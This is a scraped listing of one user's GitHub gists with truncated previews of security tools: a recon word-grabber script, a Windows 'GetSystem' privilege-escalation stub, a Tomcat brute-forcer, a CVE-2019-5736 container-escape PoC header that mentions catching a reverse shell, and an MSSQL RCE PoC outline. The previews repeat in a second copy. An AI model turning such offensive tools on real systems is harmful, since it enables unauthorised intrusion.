Santhosh Baswa P3t3rp4rk3r

## defcon29-recon.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                P3t3rp4rk3r
                / defcon29-recon.md
            
            
              Created
              August 16, 2021 07:47
                — forked from salaheldinaz/defcon29-recon.md
            
              
                DEFCON29 Recon Village Toots & Resources
              
          
    🧰 DEFCON29 Recon Village Resources

Talks videos  🎬 Watch here


Future of Asset Management - Ben Sadeghipour

Where to find Domains/subdomains:


Acquisitions https://acquiredby.co/apple-acquisitions/


## wordgrab.sh
# with user-agent
# credits @fo0_
wordgrab() {
  url=$1
  tmpfile="$(date "+%s")"
  curl -sLk -m 3 -A "Mozilla/5.0 (X11; Linux; rv:74.0) Gecko/20100101 Firefox/74.0" https://$url | html2text | egrep -io "[0-9a-zA-Z\-]+" | tr '[:upper:]' '[:lower:]' | sed -r "s/^[^a-z]+//g" | sed -r "s/[^a-z0-9]+$//g" | sort -fu | tee -a $tmpfile | tr '-' '.'  | tee -a $tmpfile | tr "." "\n" >> $tmpfile
  cat $tmpfile | sort -fu
  rm $tmpfile
}

## GetSystem.cs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;

namespace GetSystem
{
    class Program
    {

## php-curl-crlf-injection.mkd

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                P3t3rp4rk3r
                / php-curl-crlf-injection.mkd
            
            
              Created
              January 5, 2020 13:17
                — forked from tomnomnom/php-curl-crlf-injection.mkd
            
              
                CRLF Injection Into PHP's cURL Options
              
          
    CRLF Injection Into PHP's cURL Options

I spent the weekend meeting hackers in Vegas, and I got talking to one of them about
CRLF Injection. They'd not seen many CRLF Injection vulnerabilities in the wild, so
I thought I'd write up an example that's similar to something I found a few months ago.
If you're looking for bugs legally through a program like hackerone,
or you're a programmer wanting to write secure PHP: this might be useful to you.

  
## autoProc.py
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# A similar approach to smbexec but executing commands through WMI.
# Main advantage here is it runs under the user (has to be Admin)
# account, not SYSTEM, plus, it doesn't generate noisy messages

## disposableemailproviders
0-00.usa.cc
0-mail.com
001.igg.biz
0039.cf
0039.ga
0039.gq
0039.ml
027168.com
0317123.cn
0815.ru

## tomcat_bruteforce.py
"""
    Tomcat bruteforce
    Author: @itsecurityco
"""

import os
import sys
import getopt
import base64
import requests

## parse_austria.php
<?php
$infile = 'austria.csv';
$outfile = 'austria.ips';

$fp = fopen($outfile,'w');
$handle = fopen($infile, "r");
if ($handle)
{
    while (($line = fgets($handle)) !== false) {
        $line = trim($line);

## cve-2019-5736.py
#!/bin/python3
# Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief)
# Target will need a python3 interpreter
# Edit IP info below, on the host run a netcat to catch the reverse shell
# Run this python file in the container
# Then from the host: docker exec -i <container name> /tmp/evil
import os
import stat

host='172.17.0.1'

## bad_sequel.py
#!/usr/bin/env python

# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
# this is a rough PoC

# requirements for RCE:
# - the attacker needs to either have or create an object with a service principal name
# - the MSSQL server has to be running under the context of System/Network Service/a virtual account
# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts)
# - NTLM has to be in use
	# with user-agent
	# credits @fo0_
	wordgrab() {
	url=$1
	tmpfile="$(date "+%s")"
	curl -sLk -m 3 -A "Mozilla/5.0 (X11; Linux; rv:74.0) Gecko/20100101 Firefox/74.0" https://$url \| html2text \| egrep -io "[0-9a-zA-Z\-]+" \| tr '[:upper:]' '[:lower:]' \| sed -r "s/^[^a-z]+//g" \| sed -r "s/[^a-z0-9]+$//g" \| sort -fu \| tee -a $tmpfile \| tr '-' '.' \| tee -a $tmpfile \| tr "." "\n" >> $tmpfile
	cat $tmpfile \| sort -fu
	rm $tmpfile
	}
	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using System.Security.Principal;

	namespace GetSystem
	{
	class Program
	{
	#!/usr/bin/env python
	# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
	#
	# This software is provided under under a slightly modified version
	# of the Apache Software License. See the accompanying LICENSE file
	# for more information.
	#
	# A similar approach to smbexec but executing commands through WMI.
	# Main advantage here is it runs under the user (has to be Admin)
	# account, not SYSTEM, plus, it doesn't generate noisy messages
	0-00.usa.cc
	0-mail.com
	001.igg.biz
	0039.cf
	0039.ga
	0039.gq
	0039.ml
	027168.com
	0317123.cn
	0815.ru
	"""
	Tomcat bruteforce
	Author: @itsecurityco
	"""

	import os
	import sys
	import getopt
	import base64
	import requests
	<?php
	$infile = 'austria.csv';
	$outfile = 'austria.ips';

	$fp = fopen($outfile,'w');
	$handle = fopen($infile, "r");
	if ($handle)
	{
	while (($line = fgets($handle)) !== false) {
	$line = trim($line);
	#!/bin/python3
	# Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief)
	# Target will need a python3 interpreter
	# Edit IP info below, on the host run a netcat to catch the reverse shell
	# Run this python file in the container
	# Then from the host: docker exec -i <container name> /tmp/evil
	import os
	import stat

	host='172.17.0.1'
	#!/usr/bin/env python

	# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
	# this is a rough PoC

	# requirements for RCE:
	# - the attacker needs to either have or create an object with a service principal name
	# - the MSSQL server has to be running under the context of System/Network Service/a virtual account
	# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts)
	# - NTLM has to be in use